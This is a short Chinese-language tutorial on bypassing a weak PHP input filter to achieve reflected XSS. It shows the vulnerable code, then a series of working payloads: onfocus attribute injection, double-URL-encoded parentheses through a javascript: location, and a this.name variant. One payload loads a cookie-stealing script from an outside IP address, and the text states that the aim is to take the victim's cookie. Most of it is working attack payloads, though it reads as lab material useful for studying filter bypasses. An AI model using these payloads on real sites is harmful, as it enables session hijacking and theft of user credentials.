先看下程序大概写法:
<?php
header("X-XSS-Protection:0");
$out = $_GET['code'];
$out = str_replace("<","<",$out);
$out = str_replace(">",">",$out);
$out = str_replace("("," ",$out);
$out = str_replace(")"," ",$out);
$out = str_replace("'"," ",$out);
echo "<html>
<body>
<input value=\"$out\">
</body>
</html>";
?>
首先编码了尖括号,那么无法闭合input标签,注意到这里是没有过滤双引号的。
http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=alert(1) x="
输出源码如下:
<input value="1" autofocus onfocus=alert 1 x="">
因为过滤了小括号,无法弹窗,可以考虑用location中URL编码小括号绕过。
http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location='javasCript:alert%25281%2529' x="
但是这里过滤了单引号,我们改为双引号
http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location="javasCript:s=document.createElement%2528%2522script%2522%2529;s.src=%2522//120.92.84.50/myjs/cookie.js%2522;document.body.appendChild%2528s%2529;" x="
或者使用this.name传入,修改如下:
http://192.168.192.120:8080/1.php?code=1" name=javasCript:alert%25281%2529 autofocus onfocus=location=this.name x="
可以成功弹窗了,然后引入js,获取Cookie。
参考文章:
https://www.secpulse.com/archives/47696.html